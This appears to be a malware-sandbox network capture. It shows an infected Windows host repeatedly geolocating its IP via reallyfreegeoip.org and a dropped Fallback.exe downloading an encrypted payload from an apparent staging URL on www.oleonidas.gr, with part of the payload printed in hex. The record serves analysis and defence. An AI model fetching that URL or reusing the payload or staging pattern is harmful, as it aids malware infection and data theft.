                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                            2024-11-08 10:51:22 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549711188.114.96.3443360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:23 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:24 UTC1219INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:23 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15798
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2UTcp1UPgLLVg%2Fa4xGkxPquN6s1yNXHJMl31slmQsJEpcQ99rmMUqgN3NxS61oNh%2FaTOKg17f55jzZIFetOnlI%2BfiPSsXzNI9TVZX4RkUZl7cxHJy3kn6TJmsCEXhhwJa6U24%2Bi3"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df501f29bd72cd8-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1519&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1924252&cwnd=245&unsent_bytes=0&cid=2401d78e5d6292c4&ts=471&x=0"
                                                            2024-11-08 10:51:24 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                            2024-11-08 10:51:24 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549713188.114.96.3443360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:25 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-11-08 10:51:25 UTC1213INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:25 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15800
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uex1WZmoidL0WAcFAeCaIFr81qukra7NHfFGXCCGz1ds4qBjfYq2CNmPJ0m9QMJjcAjd7g31vdyc9UmpImoZWZ2w9AwQlgR4rwsnmuhZEfnI36UZU6BaW%2FL3gnHyq5VepDUXsJra"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df501fd7ae7346d-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1140&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2567375&cwnd=240&unsent_bytes=0&cid=d3a6feea8a7272b1&ts=142&x=0"
                                                            2024-11-08 10:51:25 UTC156INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
                                                            2024-11-08 10:51:25 UTC203INData Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549715188.114.96.3443360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:28 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:28 UTC1223INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:28 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15803
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDXCkTSfoOUkj6KVtJL6I%2B7DpG2CUAq9Sdts4nX3ZzhLyYs9UzXZ5SWrF%2BkRJI%2BNv0CXOflVYHQv6Nc%2FhQDCC5KVP%2BAF6eMbLD8ICD0BYV5k90gqH3LFNyOe4knkMx%2BwWKHGOIrx"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5020d7aa63160-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1336&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2019525&cwnd=240&unsent_bytes=0&cid=00aa78db9eb6f03b&ts=433&x=0"
                                                            2024-11-08 10:51:28 UTC146INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                                            2024-11-08 10:51:28 UTC213INData Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549721188.114.96.3443360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:29 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-11-08 10:51:29 UTC1227INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:29 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15804
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XHOBATqOFZoQb4XAKZF2ma2TUaaSPmHB%2F%2B6iBg76yl%2FDGrvTgB4qXtdeMZxGowrD1rtYk%2F2xV5%2BbwT%2B%2F97LjBiBBQEUpSPnMx2WmwEoZRJD5uCblra7%2BYzd1YI8LCfA4xzIn2ACR"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df50217bc0b3594-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2458404&cwnd=251&unsent_bytes=0&cid=1f06358f3b77a8eb&ts=147&x=0"
                                                            2024-11-08 10:51:29 UTC142INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Re
                                                            2024-11-08 10:51:29 UTC217INData Raw: 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: gionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549722185.78.221.734431096C:\Users\user\AppData\Roaming\Fallback.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:30 UTC86OUTGET /slim/Knlpdavcfrw.vdf HTTP/1.1
                                                            Host: www.oleonidas.gr
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:31 UTC273INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:30 GMT
                                                            Server: Apache
                                                            Last-Modified: Fri, 08 Nov 2024 05:15:34 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 952328
                                                            Cache-Control: max-age=1209600
                                                            Expires: Fri, 22 Nov 2024 10:51:30 GMT
                                                            Vary: User-Agent
                                                            Connection: close
                                                            2024-11-08 10:51:31 UTC7919INData Raw: 86 32 08 29 57 55 bc 15 84 b2 50 0b e0 b0 b1 85 a8 db 53 fc 8b d0 a6 33 f8 28 3c 0f c7 85 dc 0b f0 50 13 0b 80 7d 16 06 57 d3 13 f8 10 78 85 1f 7b a0 32 21 4f d0 ff 23 ea 4d f0 4d 2a e3 4c 92 c4 4c e9 3a 9e cc 9d 6d c2 d7 bb 93 d5 1e ea aa 2f e9 6f ef 04 0b 08 6e c4 2f 84 d0 44 cb 3e cc 14 1b f4 b2 7c 04 27 39 4f 17 92 11 65 9b c9 ed 49 81 2a da 6f 35 50 5c 80 84 75 6f b1 00 5d 78 ab bc d0 a0 b4 c9 3f 60 e0 58 3e 59 f0 b1 ec 9d 91 65 1c 13 0b 11 e3 39 cf 5a f2 75 0a eb 20 b0 69 68 cb 14 c6 d2 cb 5d 4c 66 49 c2 7c 44 9f 8d 98 db 4f 77 94 61 87 05 33 c8 71 41 ea c6 65 48 73 6d ed 90 ae 96 77 c0 59 0f fb e6 05 8e 6f 28 22 6d dd c7 82 02 31 b1 12 c2 6c 7e a5 45 b9 5b 4c 0e 2e d4 02 73 1e 81 f5 00 de 18 78 fd 58 4c a8 9f 7a 07 a8 d7 3c 06 51 19 86 c0 7b b6 f4
                                                            Data Ascii: 2)WUPS3(<P}Wx{2!O#MM*LL:m/on/D>|'9OeI*o5P\uo]x?`X>Ye9Zu ih]LfI|DOwa3qAeHsmwYo("m1l~E[L.sxXLz<Q{
                                                            2024-11-08 10:51:31 UTC8000INData Raw: c8 fb 4b 34 f7 cd 72 37 9a 7c 88 62 46 bc dc c0 8c ab 3c 28 d8 fe 22 03 38 85 31 d9 97 3a f0 5f 7d 75 f4 98 fc 04 2e d0 fc e5 06 48 7a d6 0d 92 89 50 f1 06 86 c3 46 ae 8a 31 a9 a3 2e 45 0a 91 8f c1 a2 92 83 42 9f 9e 42 fd d9 e7 61 f6 90 78 6e 3f ab 8c 5c 2a 33 4c 29 6a 84 ed c1 71 40 4b 59 f7 d3 e1 51 70 28 2b 2c 82 74 5d b0 52 f2 08 7d b3 30 f3 c9 24 3f 87 68 e7 b2 c6 1a b6 db 50 31 d3 c7 fe 40 c1 27 80 01 ec ad 5a ed 06 86 61 e9 72 8c f3 61 15 77 8d c9 65 e7 b8 24 96 f2 0d da 1c cf 53 bc 50 93 6c ab af cf 2d 88 45 65 81 ac ff 19 ff 86 09 bd 71 ba d9 56 76 44 c2 cd 8f 3c 1d 85 3e 03 c7 99 40 e2 f4 33 95 78 b3 6c 01 d7 03 14 f1 91 cd 49 1f 08 b5 bd 72 64 04 f3 89 4e c7 a8 64 87 84 75 1a 46 37 36 6a 83 5f 73 64 58 57 f4 35 cd c0 ab 64 7e 65 23 9b 6d 43 cb
                                                            Data Ascii: K4r7|bF<("81:_}u.HzPF1.EBBaxn?\*3L)jq@KYQp(+,t]R}0$?hP1@'Zarawe$SPl-EeqVvD<>@3xlIrdNduF76j_sdXW5d~e#mC
                                                            2024-11-08 10:51:31 UTC8000INData Raw: 99 c2 0f 9f fd 00 b3 6d 94 87 e9 83 48 61 f4 91 fd e2 d2 39 3b 11 ee 98 73 31 5e 71 a0 5a 42 22 3d a3 e0 87 a8 8e 9e af 49 fa af ee ff 4b 21 a8 6e 12 47 37 8a 9d 62 37 64 c6 a4 4e 3c 99 62 5b 46 00 17 00 c2 11 06 00 17 62 dd 0f 81 1d d8 04 de 6d eb 48 bf 21 58 0b 4f 41 75 a2 20 52 c2 16 60 ea 6b fe 5a 5a 81 9c d6 15 2b 4e 76 a6 e3 17 08 25 44 25 ec 31 09 ab f7 74 7c a8 dc 14 02 6b 42 53 89 2e 68 c3 2b 49 c5 4c 24 e0 ad 9a fc b7 ff 53 40 a6 c3 35 c0 19 a6 b1 61 27 6e 88 c1 ac c2 ed 86 4f 7c 6f 1e c3 33 a9 e0 79 99 5d 65 b5 eb c9 ac 33 2f ae d9 57 18 b7 0b 35 37 fc 71 32 78 8c da 65 35 c7 62 ed 96 4e 47 50 25 1d ae 53 af e5 d8 29 2e 20 fd 80 eb a8 cc 97 91 27 24 5d 7c c6 57 42 4f 8d 4d b0 6e 8c 7d 2b cb 67 cf 14 d4 bd 2d ad 8b b8 13 da 4b d7 1d b9 0d f1 e0
                                                            Data Ascii: mHa9;s1^qZB"=IK!nG7b7dN<b[FbmH!XOAu R`kZZ+Nv%D%1t|kBS.h+IL$S@5a'nO|o3y]e3/W57q2xe5bNGP%S). '$]|WBOMn}+g-K
                                                            2024-11-08 10:51:31 UTC8000INData Raw: 66 75 7d 97 35 ea 54 6b 3c 0e e3 05 65 58 ac c6 5a 1e 4c 21 ee 0c 7e 04 6f b6 e2 f4 69 24 a9 ca fe 02 8a 0b 83 db 56 e8 d4 e1 b2 76 93 be 66 1a 57 5e 31 90 21 6f 6b 37 6f ae 3b 90 f9 5e 2c bc 1a 58 17 0e 8d 34 45 ef 1c c4 b2 fb b0 91 1c 5d 58 b3 56 b7 9f 1f 12 89 96 3e a5 10 4b 50 84 0e 65 1e b4 69 98 1a 5f 61 3b 0e e8 8c 8b 60 9e e0 2e a5 83 be f5 49 0a 8e 3a 9e 2f f6 f7 13 84 ae c3 4f 6f 16 e2 c2 0d 93 1b 11 97 e3 9b 47 01 ca 3d 1b 82 0d 04 c7 2f 94 39 99 94 d8 8c cf b5 12 d5 b5 2f 8d b2 a3 7e 50 22 18 dc f4 e2 f7 9a 7e 80 59 a4 21 87 99 21 65 a3 ef 9e a2 ee b7 32 e3 ba 1c 3a df 92 ad 7f 80 0a 4d c6 88 3b 7f 89 09 19 d6 a5 e0 87 04 a7 e4 de 74 3a 35 51 a6 fd 14 98 dd e4 4c 20 b1 2a 1b 50 2b b4 0f eb 4f 0b 8c 58 04 09 13 3d 6f 2c b5 03 db 67 fc 22 0b eb
                                                            Data Ascii: fu}5Tk<eXZL!~oi$VvfW^1!ok7o;^,X4E]XV>KPei_a;`.I:/OoG=/9/~P"~Y!!e2:M;t:5QL *P+OX=o,g"
                                                            2024-11-08 10:51:31 UTC8000INData Raw: 80 3e c9 92 e6 55 7e ca 7e 5c 06 5b 3c ca 0a 7c 05 e1 eb 19 be d5 2b 1d db 1d 23 10 ee b6 1e d6 5b 9d 24 f8 a7 01 06 9b 90 86 6e 61 4e eb 2e ae 81 a9 2f a5 ac 75 f3 da 28 f7 d2 86 97 79 c9 a4 5d 60 36 0f 79 29 42 4e 2d aa c9 71 79 24 cb 74 18 dd ed 01 9a ea 15 ef ea 7a dd 2e a3 b2 8e 1f c1 56 fa 2b 59 dd 2f ba 3d 2d 1e 29 68 64 4d 6f 2a 4f b4 60 cd 00 da 2d 2b bb 04 42 e3 46 4a 71 8b 76 90 6f e7 80 22 2d 5a fc e7 eb a9 a6 6d 53 43 97 4e f0 bc f4 f0 33 cc c6 34 76 bd 87 10 37 6d 2a 61 19 87 ee 0c 12 38 4e e9 1b 0f a9 7e 56 e8 2d 84 5e 36 b8 30 03 78 ac 3c 56 16 c3 63 59 6c 61 a2 df 3a 55 5e 90 f4 45 97 f0 54 60 6e 08 7a 30 41 07 e6 42 61 8e 03 5b 5a 83 b1 da 01 b8 d6 5f 63 62 dc 60 16 3a cf 88 47 54 b5 5e 89 09 ba 46 4f ed ad f4 76 e6 b9 71 b1 b0 83 c7 99
                                                            Data Ascii: >U~~\[<|+#[$naN./u(y]`6y)BN-qy$tz.V+Y/=-)hdMo*O`-+BFJqvo"-ZmSCN34v7m*a8N~V-^60x<VcYla:U^ET`nz0ABa[Z_cb`:GT^FOvq
                                                            2024-11-08 10:51:31 UTC8000INData Raw: fe ee 88 78 96 97 f8 60 a4 d8 2c 94 25 2a 2b ce ea 2e 8b 05 5e cc fd aa 4d 1c 72 e5 1b 93 1a 02 8b aa f5 40 65 ff 93 e4 26 b3 96 79 54 f2 42 0c 53 89 d2 79 47 0c f7 8b e8 12 69 de 12 3b 52 af 24 f2 eb f7 96 5d 97 c0 f3 30 f2 1c a8 74 03 f7 32 4c 45 c8 d1 e6 cf 81 6e 4f fb c9 6f 89 e8 92 9d ef fc a4 8e b6 5c 12 9b 78 f6 8c f9 67 f0 f0 1f 8f ec 4f 63 a5 25 43 e6 2d 74 13 41 de f7 6a 24 35 7b b1 34 e7 9c 2c a4 fb 08 30 2c a8 8f b4 ef 98 da 9d 61 6d 4d bd 80 d4 fe 8a 34 df df 30 34 ba f9 05 be d3 15 73 3c 2a 4b eb 8c 0e 16 58 f9 02 d9 cb fe 61 4a d1 e8 20 cf 2d db 4a 7e 64 cc 3e 22 b4 ef 5a 28 d1 ed 92 54 17 04 14 58 2b 60 89 d9 53 69 80 e2 6c 44 ed 68 31 8e 96 a8 f1 15 5e ad ce dd 4b 26 fd 2a 76 b4 49 44 f3 33 e4 91 0f f4 22 64 ca ce dd 9a e9 23 c8 36 0a da
                                                            Data Ascii: x`,%*+.^Mr@e&yTBSyGi;R$]0t2LEnOo\xgOc%C-tAj$5{4,0,amM404s<*KXaJ -J~d>"Z(TX+`SilDh1^K&*vID3"d#6
